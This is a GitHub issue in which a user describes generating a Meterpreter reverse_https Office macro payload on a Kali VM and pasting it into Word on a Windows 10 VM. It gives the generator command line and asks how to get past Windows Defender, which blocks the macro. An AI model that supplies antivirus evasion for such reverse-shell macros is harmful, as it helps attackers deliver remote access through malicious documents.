
Macro reverse_https is detected by Windows Defender. Is there a workaround for this?

TheDumbCatto opened this issue · 0 comments

Thank you for putting the time and effort into making this powerful tool. I just tried this out today with a Kali VM and a Windows 10 VM. The Windows VM has full Windows Defender options on.

On the Kali VM, I ran:
python3 windows/meterpreter/reverse_https <Local_ip_address> 8080 macro

Then, I
cat powershell_attack.txt
and pasted the output (having replaced Auto_Open with AutoOpen) to my Windows VM word macro.

As soon as I hit Ctrl+S, the machine warns of the virus and prevents the macro from being saved.

I don't really know what could be the causes for the problem. Any help would be appreciated. Thank you in advance!